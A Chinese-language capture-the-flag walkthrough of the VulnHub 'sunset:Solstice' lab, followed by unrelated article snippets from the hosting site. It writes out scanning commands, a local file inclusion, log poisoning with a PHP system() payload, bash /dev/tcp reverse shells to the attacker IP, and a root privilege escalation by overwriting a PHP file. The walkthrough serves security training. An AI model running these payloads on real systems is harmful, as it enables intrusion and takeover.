sunset:Solstice靶場

sunset:Solstice

https://www.vulnhub.com/entry/sunset-solstice,499/

1,將兩臺虛擬機網絡連接都改為NAT模式

2,攻擊機上做namp局域網掃描發現靶機

nmap -sn 192.168.23.0/24

那么攻擊機IP為192.168.23.182,靶場IP192.168.23.244

3,對靶機進行端口服務探測

nmap -sV -T4 -p- -A 192.168.23.244

1.?FTP服務分析(21/tcp, 2121/tcp, 62524/tcp)

pyftpdlib 1.5.6 (21/tcp, 2121/tcp):

  • 匿名登錄允許(2121端口):嘗試登錄?ftp://192.168.23.244:2121 用戶名為?anonymous,空密碼。
  • 檢查?pub?目錄:ls -al?查看權限和文件。若可寫,可上傳反向Shell或測試文件。
  • 搜索漏洞:pyftpdlib 1.5.6 是否存在已知漏洞(如CVE-2021-30800)。

FreeFloat ftpd 1.00 (62524/tcp):

  • 舊版本,可能存在緩沖區溢出漏洞(如CVE-2010-4221)。使用?searchsploit freefloat?查找EXP。

2.?SSH服務分析(22/tcp)

OpenSSH 7.9p1:

  • 檢查版本是否有已知漏洞(如CVE-2021-41617),但該版本較新,可能已修復。
  • 若獲取憑證,可嘗試登錄。或通過其他服務(如FTP/SMB)泄露的憑證進行爆破。

3.?SMTP服務分析(25/tcp)

Exim smtpd:

  • 使用?smtp-user-enum?或手動命令枚舉用戶:
    telnet 192.168.23.244 25
    VRFY root?????
    # 測試是否存在用戶
  • 檢查CVE-2019-15846(Exim 4.92.1以下遠程代碼執行),但需確認版本是否受影響。

4.?HTTP服務分析(80/tcp, 8593/tcp, 54787/tcp)

Apache 2.4.38 (80/tcp):

  • 訪問?http://192.168.23.244,檢查頁面內容
  • 使用目錄枚舉工具:
    gobuster dir -u
    http://192.168.23.244 -w /usr/share/wordlists/dirbuster/common.txt

PHP cli服務器 (8593/tcp, 54787/tcp):

  • 訪問?http://192.168.23.244:8593?和?http://192.168.23.244:54787,檢查應用功能
  • 檢查PHP版本漏洞(7.3.14),如反序列化、文件包含(?page=../../etc/passwd)。

5.?SMB服務分析(139/tcp, 445/tcp)

Samba 4.9.5-Debian:

  • 枚舉共享和用戶:
    smbclient -L 192.168.23.244 -N
    enum4linux -a 192.168.23.244
  • 檢查匿名訪問共享:
    smbclient
    \\\\192.168.23.244\\[sharename] -N
  • 測試CVE-2017-7494(Samba遠程代碼執行),但需配置允許寫入共享。

6.?Squid代理分析(3128/tcp)

Squid 4.6:

  • 測試代理是否開放:
    curl -x
    http://192.168.23.244:3128 Example Domain
  • 若可用,用于掃描內網或訪問受限資源。

?

421端口的ftp服務器登錄失敗,登錄2121端口的ftp服務器成功

ftp 192.168.23.244

ftp 192.168.23.244 2121

再看看web服務的幾個端口

http://192.168.23.244/

http://192.168.23.244:8593/

http://192.168.23.244:54787/

5,經過測試這個網站存在本地文件包含漏洞

http://192.168.23.244:8593/index.php?book=../../../../../../etc/passwd

那么就需要把這個本地文件包含漏洞利用起來,然后getshell。正好能夠包含

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log

使用nc污染日志

echo -e "GET / HTTP/1.1\r\nHost: 192.168.23.244\r\nUser-Agent: <?php system(\$_GET['cmd']); ?>\r\nConnection: close\r\n\r\n" | nc 192.168.23.244 80

訪問文件包含網頁確定漏洞是否利用成功

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=id

漏洞利用成功,成功執行了系統命令,接下來構造命令反彈shell(需要URL編碼)

bash -c 'exec bash -i &>/dev/tcp/192.168.23.182/4444 <&1'

http://192.168.23.244:8593/index.php?book=../../../../../../../../../var/log/apache2/access.log&cmd=bash%20-c%20%27exec%20bash%20-i%20%26%3E/dev/tcp/192.168.23.182/4444%20%3C%261%27%0A

使用kali接收來自靶機的shell

6,信息收集一下

uname -a

cat /etc/*-release

getconf LONG_BIT

搜索一下root用戶可讀可寫的可執行文件

find / -type f -user root -perm -o=w 2>/dev/null | grep -v "/sys/" | grep -v "/proc/"

查看一下這個文件

cat /var/tmp/sv/index.php

查看一下進程

ps -ef | grep "/var/tmp/sv"

發現有一個進程使用php解釋器執行/var/tmp/sv,使用ehco寫入木馬構造惡意php文件

echo "<?php" > /var/tmp/sv/index.php && echo "echo \"Under construction\";" >> /var/tmp/sv/index.php && echo "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.168.23.182/8888 0>&1'\");" >> /var/tmp/sv/index.php && echo "?>" >> /var/tmp/sv/index.php

cat /var/tmp/sv/index.php

靶機上通過nc訪問運行這個進程的57端口,并請求/index.php文件

cd /tmp

curl localhost:57

然后kali開啟對8888端口的監聽

nc -lvvp 8888

成功提權成為root用戶,拿到flag

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/pingmian/80341.shtml
繁體地址,請注明出處:http://hk.pswp.cn/pingmian/80341.shtml
英文地址,請注明出處:http://en.pswp.cn/pingmian/80341.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

AZScreenRecorder最新版:功能強大、操作簡便的手機錄屏軟件

AZScreenRecorder最新版是一款功能強大的手機錄屏軟件&#xff0c;專為安卓設備設計。它無需ROOT權限&#xff0c;支持無限錄制時長&#xff0c;操作簡單&#xff0c;錄制過程中可以隨時暫停&#xff0c;滿足不同用戶的個性化錄屏需求。此外&#xff0c;用戶還可以自定義分辨率…

模塊自動導入的小工具

import { ref, reactive, onMounted } from vue import { useRoute, useRouter } from vue-router項目里很多文件都需要引入這些公共庫&#xff0c;比較繁瑣&#xff0c;使用一個小工具可以自動導入&#xff0c;就不需要在每個文件里面都寫這些導入的代碼了。 通過命令行下載安…

【讀書筆記】《編碼:隱匿在計算機軟硬件背后的語言》01 邏輯與開關

【讀書筆記】《編碼&#xff1a;隱匿在計算機軟硬件背后的語言》01 邏輯與開關 前言01 邏輯與開關 前言 我是一名光學工程專業研二的學生&#xff0c;目前正處于找工作的階段&#xff0c;根據往年師兄師姐找工作的情況&#xff0c;在西安這個城市不出意外我能找到的應該就是嵌入…

TXT編碼轉換工具iconv

iconv.exe是實現TXT編碼轉換的命令行工具&#xff0c;支持幾百種編碼格式的轉換&#xff0c;利用它可以在自主開發程序上實現TXT文檔編碼的自動轉換。 一、命令參數格式 Usage: iconv [-c] [-s] [-f fromcode] [-t tocode] [file ...] or: iconv -l 二、轉換的示例 將UTF-8…

軟考中級數據庫備考-上午篇

背景 新工作主要做大數據平臺&#xff0c;考一個軟考中級數據庫系統工程師&#xff0c;補足一下基礎知識。 基礎知識 1.計算機硬件基礎知識 正確答案:C 正確答案:D 正確答案:C 正確答案&#xff1a;BC 正確答案&#xff1a;B 正確答案:D 正確答案:A DMA建立內存與外設的直接…

AtCoder AT_abc405_d ABC405D - Escape Route

前言 BFS 算法在 AtCoder 比賽中還是會考的&#xff0c;因為不常練習導致沒想到&#xff0c;不僅錯誤 TLE 了很多&#xff0c;還影響了心態&#xff0c;3 發罰時后才 AC。 思路 首先&#xff0c;我們把所有位置和出口的距離算出來&#xff08;用 BFS&#xff09;&#xff0c…

【計算機視覺】目標檢測:yoloV1~yoloV11項目論文及對比

以下是 YOLO (You Only Look Once) 系列模型從 V1 到 V11 的詳細介紹和項目地址&#xff08;截至2024年7月&#xff09;。YOLO 是目標檢測領域的里程碑模型&#xff0c;以其 實時性 和 高精度 著稱&#xff0c;廣泛應用于自動駕駛、安防監控、工業檢測等領域。 YOLOv1 (2016) …

推薦系統架構設計

1.分析用戶行為數據?&#xff1a;? 收集用戶的活躍時間、點擊行為、瀏覽歷史等數據。?分析用戶的活躍模式&#xff0c;確定用戶最活躍的時間段。?kafka flink 數據庫 分析用戶行為并存儲 2. 預生成推薦內容?&#xff1a;? 在用戶活躍時間之前&#xff0c;預先生成推薦…

BERT類模型

1. BERT類模型是否需要處理 [CLS] 或池化&#xff1f; 那首先搞懂 [CLS] 和池化 &#xff08;1&#xff09;[CLS] 的作用 BERT 的輸入格式中&#xff0c;每個序列的開頭會添加一個特殊的 [CLS] Token&#xff08;Classification Token&#xff09;。它的設計初衷是為分類任務…

我的世界云端服務器具體是指什么?

我的世界云端服務器是指一種基于互聯網的多人游戲服務器&#xff0c;將游戲服務器運行在云平臺上&#xff0c;而不是在本地計算機中&#xff0c;這使用戶不需要考慮自身電腦的性能和網絡穩定性&#xff0c;只需要通過網絡連接到云端服務器&#xff0c;就可以享受到順暢的游戲體…

軟考(信息系統運行管理員)

第一章 信息系統運維概述 1.1 信息系統概述 信息的含義和類型 信息的含義&#xff1a; 一般&#xff1a;人們關心的事情的消息或知識。香農&#xff08;信息論創始人&#xff09;&#xff1a;用來減少隨機不確定性的東西&#xff08;標志著信息科學進入定量研究階段&#xff…

Unity基礎學習(九)輸入系統全解析:鼠標、鍵盤與軸控制

目錄 一、Input類 1. 鼠標輸入 2. 鍵盤輸入 3. 默認軸輸入 &#xff08;1&#xff09; 基礎參數 &#xff08;2&#xff09;按鍵綁定參數 &#xff08;3&#xff09;輸入響應參數 &#xff08;4&#xff09;輸入類型與設備參數 &#xff08;5&#xff09;不同類型軸的參…

VBA將PDF文檔內容逐行寫入Excel

VBA是無法直接讀取PDF文檔的&#xff0c;但結合上期我給大家介紹了PDF轉換工具xpdf-tools-4.05&#xff0c;先利用它將PDF文檔轉換為TXT文檔&#xff0c;然后再將TXT的內容寫入Excel&#xff0c;這樣就間接實現了將PDF文檔的內容導入Excel的操作。下面的代碼將向大家演示如何實…

Spring Boot之MCP Client開發全介紹

Spring AI MCP(模型上下文協議,Model Context Protocol)客戶端啟動器為 Spring Boot 應用程序中的 MCP 客戶端功能提供了自動配置支持。它支持同步和異步兩種客戶端實現方式,并提供了多種傳輸選項。 MCP 客戶端啟動器提供以下功能: 多客戶端實例管理 支持管理多個客戶端實…

[題解]2023CCPC黑龍江省賽 - Folder

來源&#xff1a;F.Folder - Codeforces題意&#xff1a;給定由 n ( 1 ≤ n ≤ 1 0 5 ) n(1\le n\le 10^5) n(1≤n≤105)個結點組成的樹&#xff0c;每次操作可將一棵子樹接到其他結點上。求將樹轉換為一棵斜樹的最小操作次數。關鍵詞&#xff1a;思維(簽到)題解&#xff1a;斜…

string[字符串中第一個的唯一字符][藍橋杯]

使用哈希表解決 class Solution { public:int firstUniqChar(string s) {int arr[26];for(int i0;i<s.size();i){arr[s[i]-a];}for(int i0;i<s.size();i){if(arr[s[i]-a]1)return i;}return -1;} };

【深度學習-Day 8】讓數據說話:Python 可視化雙雄 Matplotlib 與 Seaborn 教程

Langchain系列文章目錄 01-玩轉LangChain&#xff1a;從模型調用到Prompt模板與輸出解析的完整指南 02-玩轉 LangChain Memory 模塊&#xff1a;四種記憶類型詳解及應用場景全覆蓋 03-全面掌握 LangChain&#xff1a;從核心鏈條構建到動態任務分配的實戰指南 04-玩轉 LangChai…

Flink 實時數據一致性與 Exactly-Once 語義保障實戰

在構建企業級實時數倉的過程中,“數據一致性” 是保障指標準確性的核心能力,尤其是在金融、電商、醫療等對數據敏感度極高的場景中。Flink 作為流批一體的實時計算引擎,其內建的 Exactly-Once 語義為我們提供了強有力的保障機制。本篇將圍繞如何實現端到端的數據一致性、如何…

傅利葉十周年,升級核心戰略:“有溫度”的具身智能藍圖

5月9日&#xff0c;傅利葉十周年慶典暨首屆具身智能生態峰會在上海正式召開。本次大會以“十年共創&#xff0c;具身成翼”為主題&#xff0c;匯聚了來自通用機器人與醫療康復領域的頂尖專家學者、合作伙伴與投資機構&#xff0c;共同探索具身智能在未來十年的技術應用與生態發…

Docker中mysql鏡像保存與導入

一、Docker中mysql鏡像保存 Docker 的 MySQL 鏡像保存通常有兩種場景&#xff1a;一種是保存鏡像本身的修改&#xff08;如配置、初始化數據&#xff09;&#xff0c;另一種是持久化保存容器運行時產生的數據&#xff08;如數據庫表、用戶數據&#xff09;。以下是具體方法&am…